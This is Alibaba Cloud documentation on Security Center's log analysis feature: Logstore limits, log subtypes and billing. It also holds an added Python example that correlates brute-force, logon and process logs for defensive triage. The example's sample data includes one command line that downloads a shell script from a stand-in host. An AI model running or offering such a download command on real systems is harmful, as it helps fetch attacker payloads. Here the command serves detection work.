Alibaba Cloud Simple Log Service and Security Center jointly provide the log analysis feature, which allows you to collect, query, analyze, transform, and consume risk data in real time. You can use the log analysis feature to monitor and handle potential risks to your servers and to manage cloud resources centrally. This topic describes the assets, billing, and limits of the log analysis feature.
Limits
You can write only Security Center logs to the dedicated Logstore. You cannot modify the attributes of the Logstore, such as the log retention period.
Security Center logs must be retained for at least 180 days to comply with the Cybersecurity Law of the People's Republic of China. We recommend that you allocate a log storage capacity of 40 GB for each server.
Security Center Basic Edition does not support the log analysis feature. Security Center Ultimate Edition and Enterprise Edition support query for network logs, security logs, and host logs. Security Center Advanced Edition and Anti-virus Edition support query for security logs and host logs. For more information about the billing of these editions, see Billing overview.
Assets
Dedicated project and Logstore
After you enable the log analysis feature, Simple Log Service creates a project named sas-log-<Alibaba Cloud account ID>-<Region ID> and a dedicated Logstore named sas-log by default. The following table describes the region in which the project is created.
Region of Security Center | Region of the Simple Log Service project
China | China (Hangzhou)
Outside China | Singapore
Important: Do not delete the project or Logstore that is related to Security Center logs. Otherwise, Security Center logs cannot be sent to Simple Log Service.
If you accidentally delete the dedicated Logstore, you are prompted that the sas-log Logstore does not exist, and all log data in the Logstore is lost. In this case, submit a ticket to restore the Logstore. Logs that were lost cannot be recovered, even after you re-enable the log analysis feature once the Logstore is restored.
If you have enabled the pay-by-ingested-data billing mode, Simple Log Service creates a dedicated Logstore that uses the pay-by-ingested-data billing mode by default. If you want to switch the billing mode from pay-by-ingested-data to pay-by-feature, you can modify the configuration of the Logstore. For more information, see Modify the configurations of a Logstore.
Dedicated dashboards
Security Center logs are classified into three types. After you enable the log analysis feature of Security Center, Simple Log Service generates nine dashboards by default.
Important: We recommend that you do not make changes to the dedicated dashboards because the dashboards may be upgraded or updated at any time. To display query results, create a custom dashboard instead. For more information, see Create a dashboard.
Supported log types
Security Center Enterprise Edition and Ultimate Edition support 16 subtypes of logs that belong to the host, security, and network log types. Security Center Anti-virus Edition and Advanced Edition support 12 subtypes of logs that belong to the host and security log types.
Network log types
Collection cycle for all network log types: in most cases, logs are collected 1 to 12 hours after the logs are generated.
__topic__ | Description
sas-log-http | Logs of user requests to web servers and responses from the web servers, including the IP address of the user, request time, request method, request URL, HTTP status code, and response size. Web access logs are used to analyze web traffic and user behavior, identify access patterns and exceptions, and optimize website performance.
sas-log-dns | Logs of DNS resolution details, including the requested domain name, query type, IP address of the client, and response value. You can monitor the request and response process of DNS resolution, and identify abnormal resolution behavior, DNS hijacking, and DNS poisoning based on DNS logs.
local-dns | Logs of DNS queries and responses on the local DNS server, including the requested domain name, query type, IP address of the client, and response value. You can obtain information about DNS queries in your network, and identify issues such as abnormal query behavior, domain hijacking, and DNS poisoning based on internal DNS logs.
sas-log-session | Logs of network connections and data transmission, including the details of network sessions. The details include the session start time, source IP address, destination IP address, protocol, and ports. Network session logs are generally used to monitor network traffic, identify potential threats, and optimize network performance.
Host log types
__topic__ | Description | Collection cycle
aegis-log-login | Logs of user logons to servers, including the logon time, logon user, logon method, and logon IP address. Logon logs can help you monitor user activities, and identify and respond to abnormal behavior at the earliest opportunity. This helps ensure system security. Note: Security Center does not collect the logs of logons to servers that run Windows Server 2008. | Logs are collected in real time.
aegis-log-network | Logs of network connections, including the 5-tuples of connections to servers, connection time, and connection status. Network connection logs can help you detect suspicious connections, identify potential network attacks, and optimize network performance. | Logs are collected in real time.
aegis-log-process | Logs of server process startups, including the startup time, startup command, and parameters. You can obtain the startup status and configurations of server processes, and identify issues such as abnormal processes, malware intrusion, and threats based on process startup logs. | Logs are collected in real time, as soon as a process starts.
aegis-log-crack | Logs of brute-force attacks, including information about logon attempts, and attempts to crack systems, applications, or accounts. You can obtain information about brute-force attacks on systems or applications, and identify unusual logon attempts, weak passwords, and credential leaks based on brute-force attack logs. You can also use brute-force attack logs to trace malicious users and collect evidence to assist the security team in incident response and investigation. | Logs are collected in real time.
aegis-snapshot-host | Snapshot logs of accounts in systems or applications, including the basic information about accounts. The basic information includes the username, password policy, and logon history of an account. You can obtain the changes of accounts and identify potential risks at the earliest opportunity by comparing the account snapshot logs at different points in time. The risks include access from unauthorized accounts and abnormal account status. |
aegis-snapshot-port | Snapshot logs of network connections, including the 5-tuples of connections, connection status, and associated processes. You can obtain information about network sockets in the system, identify abnormal connections and potential network attacks, and optimize network performance based on network snapshot logs. |
aegis-snapshot-process | Snapshot logs of processes in the system, including the process ID, process name, and process start time. You can obtain information about processes in the system and resource usage of the processes, and identify issues such as abnormal processes, excessive CPU utilization, and memory leaks based on process snapshot logs. |
aegis-log-dns-query | Logs of DNS requests sent by servers, including the requested domain name, query type, and query source. You can obtain information about DNS queries in the network, and identify issues such as abnormal queries, domain hijacking, and DNS poisoning based on DNS request logs. | Logs are collected in real time.
aegis-log-client | Logs of online and offline events of the Security Center agent. | Logs are collected in real time.
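As an added example (not code from Security Center or Simple Log Service), the following Python script shows how a practitioner would use three of the host log subtypes above together once records are exported from the sas-log Logstore. It first selects records by __topic__, which is what a `__topic__: aegis-log-crack` query against the Logstore does, then flags logons in aegis-log-login that follow a burst of aegis-log-crack attempts from the same source IP against the same server, and finally lists the aegis-log-process startups on that server shortly after the flagged logon. The sample records are constructed, and the field names (uuid, warn_ip, warn_user, warn_count, warn_type, cmdline, time) are assumptions for illustration; verify them against the Log fields topic before running this against real data.

```python
"""Correlate Security Center host logs exported from the sas-log Logstore.

Added example, not Security Center or Simple Log Service code. The records
below are constructed, and the field names (uuid, warn_ip, warn_user,
warn_count, warn_type, cmdline, time) are assumptions; verify them against
the Log fields topic before using this on real data.
"""
from datetime import datetime, timedelta

TIME_FMT = "%Y-%m-%d %H:%M:%S"

# Constructed sample records shaped like __topic__-tagged events in sas-log.
SAMPLE_LOGS = [
    {"__topic__": "aegis-log-crack", "uuid": "srv-01", "warn_ip": "203.0.113.7",
     "warn_user": "root", "warn_count": 40, "time": "2024-05-01 10:00:00"},
    {"__topic__": "aegis-log-crack", "uuid": "srv-01", "warn_ip": "203.0.113.7",
     "warn_user": "root", "warn_count": 55, "time": "2024-05-01 10:05:00"},
    {"__topic__": "aegis-log-login", "uuid": "srv-01", "warn_ip": "203.0.113.7",
     "warn_user": "root", "warn_type": "SSHLOGIN", "time": "2024-05-01 10:09:30"},
    {"__topic__": "aegis-log-process", "uuid": "srv-01",
     "cmdline": "/usr/bin/curl http://example.invalid/x.sh",
     "time": "2024-05-01 10:10:00"},
    {"__topic__": "aegis-log-process", "uuid": "srv-01",
     "cmdline": "/usr/sbin/cron", "time": "2024-05-01 12:00:00"},
    {"__topic__": "aegis-log-login", "uuid": "srv-02", "warn_ip": "198.51.100.9",
     "warn_user": "admin", "warn_type": "SSHLOGIN", "time": "2024-05-01 11:00:00"},
]


def parse_time(record):
    """Return the record's time field as a datetime."""
    return datetime.strptime(record["time"], TIME_FMT)


def by_topic(logs, topic):
    """Select records of one log subtype; the offline equivalent of the
    Logstore query `__topic__: <topic>`."""
    return [r for r in logs if r.get("__topic__") == topic]


def suspicious_logons(logs, window=timedelta(minutes=30), threshold=50):
    """Flag logons that follow a burst of brute-force attempts.

    A logon is suspicious when aegis-log-crack records from the same source
    IP against the same server (uuid), within `window` before the logon,
    add up to at least `threshold` attempts.
    """
    cracks = by_topic(logs, "aegis-log-crack")
    flagged = []
    for login in by_topic(logs, "aegis-log-login"):
        t_login = parse_time(login)
        attempts = sum(
            int(c["warn_count"])
            for c in cracks
            if c["uuid"] == login["uuid"]
            and c["warn_ip"] == login["warn_ip"]
            and t_login - window <= parse_time(c) <= t_login
        )
        if attempts >= threshold:
            flagged.append({
                "uuid": login["uuid"],
                "warn_ip": login["warn_ip"],
                "warn_user": login["warn_user"],
                "logon_time": login["time"],
                "failed_attempts": attempts,
            })
    return flagged


def processes_after(logs, hit, window=timedelta(minutes=15)):
    """Return the command lines of processes started on the flagged server
    within `window` after the flagged logon, for triage."""
    t_start = datetime.strptime(hit["logon_time"], TIME_FMT)
    t_end = t_start + window
    return [
        p["cmdline"]
        for p in by_topic(logs, "aegis-log-process")
        if p["uuid"] == hit["uuid"] and t_start <= parse_time(p) <= t_end
    ]


if __name__ == "__main__":
    for hit in suspicious_logons(SAMPLE_LOGS):
        print(hit)
        for cmd in processes_after(SAMPLE_LOGS, hit):
            print("  started afterwards:", cmd)
```

On the constructed data, only the srv-01 logon from 203.0.113.7 is flagged (95 attempts in the preceding 30 minutes), and the curl download started 30 seconds later is surfaced for triage; the srv-02 logon has no preceding brute-force records and is ignored. Tune `window` and `threshold` to your environment: the brute-force count that precedes a legitimate logon is rarely zero on Internet-facing SSH.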
Security log types
Collection cycle for all security log types: logs are collected in real time.
__topic__ | Description
sas-vul-log | Logs of vulnerabilities that are detected in systems or applications, including the vulnerability name, vulnerability status, and handling action. You can obtain information about the vulnerabilities, security risks, and attack trends in the system, and take proper measures at the earliest opportunity based on vulnerability logs.
sas-hc-log | Logs of baseline check results, including the baseline severity, baseline type, and risk level. You can obtain the baseline security status and potential risks in the system based on baseline logs. Note: The logs record only check items that fail a check for the first time, and check items that passed the previous check but fail a new check.
sas-security-log | Logs of security events and alerts generated in the system and applications, including the alert data source, alert details, and alert level. You can obtain the security events and threats in the system and take proper measures at the earliest opportunity based on alert logs.
sas-cspm-log | Logs related to configuration assessment, including the check results of configuration assessment and the operations that add risk items to the whitelist. You can obtain information about errors and potential risks in the configurations of cloud services based on configuration assessment logs.
sas-net-block | Logs of network attack events, including key information such as the attack type, source IP address, and destination IP address. You can obtain network security events and implement proper response and defense measures to improve network security and reliability based on network defense logs.
sas-rasp-log | Logs of attacks on applications, including key information such as the attack type, attack pattern, and attacker IP address. You can obtain information about the security events that occur in applications and implement proper response and defense measures to improve application security and reliability based on application protection logs.
sas-filedetect-log | Logs of malicious file detection, including the file information, detection scenario, and detection result. You can identify common malware such as ransomware and mining programs in offline files and Object Storage Service (OSS) objects, and handle it at the earliest opportunity to prevent the spread and execution of malicious files based on the logs.
Billing
If the pay-by-feature billing mode is used for the dedicated Logstore, you are not charged for the read and write traffic, index traffic, storage, number of shards, or number of read and write operations in the dedicated Logstore. You are charged for Internet traffic, data transformation, and data shipping. The fees are included in the bills of Simple Log Service. For more information, see Billable items of pay-by-feature.
If the dedicated Logstore uses the pay-by-ingested-data billing mode, you are not charged for the read and write traffic, index traffic, storage, number of shards, number of read and write operations, data transformation, or data shipping in the dedicated Logstore. You are charged only for read traffic over the Internet. The fees are included in the bills of Simple Log Service. For more information, see Billable items of pay-by-ingested-data.
The fee for the log analysis feature itself, that is, the log storage capacity that you purchase for it, is included in the bills of Security Center. For more information, see Billing overview.
References
For more information about how to enable the log analysis feature of Security Center, see Enable the log analysis feature.
For more information about fields in Security Center logs, see Log fields.